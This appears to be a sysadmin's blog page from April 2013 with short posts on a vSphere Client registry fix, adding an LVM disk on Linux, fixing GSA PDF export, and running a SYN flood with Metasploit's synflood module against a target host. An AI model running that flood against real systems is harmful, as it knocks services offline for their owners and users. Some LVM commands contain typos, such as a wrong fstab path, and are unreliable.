יום ראשון, 21 באפריל 2013

Fix: VMware vSphere Client – Error 1406. Could not write value ProductLanguage


The Problem:
Got this notification when trying to install the vSphere Client 5.X on Server 2008 R2.
 
The Solution:
Go to the regedit and delete the reg entry
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.



Link:

יום רביעי, 17 באפריל 2013

Add new LVM hard disk on linux virtual machine

Add new H.D on the guest machine

 
 
 
 
# ls /sys/class/scsi_host
# echo "- - -" > /sys/class/scsi_host/host0/scan
# fdisk –l
 
 
 
# tail -f /var/log/message
# fdisk /dev/sdb
# pvcreate /dev/sdb1

vgcreate lvm01 /dev/sdb1
# vgrename lvm01 vg01
 
# vgscan

# lvcreate --name lvm01 --size 4.99G vg01
# lvscan
mkfs.ext4 /dev/vg01/lvm01
 
 
# vi /etc/fstab/df

# dev/vg01/lvm01 /mnt/lvm01/                          ext4    defaults   0 0
# df -h


 


יום שני, 8 באפריל 2013

synflood with msf

Msf  > use auxiliary/dos/tcp/synflood
Msf auxiliary (synflood) > show options
Set RHOST 192.168.0.1
Set TIMEOUT 50
Run

יום רביעי, 3 באפריל 2013

GSA - PDF Report not working

The Porblem:  
When you are trying to export your reports to pdf from the gsad  it's not working.
You just get 0 bytes pdf files


The solution: 
# apt-get -y install texlive-latex-base texlive-latex-extra texlive-latex-recommended htmldoc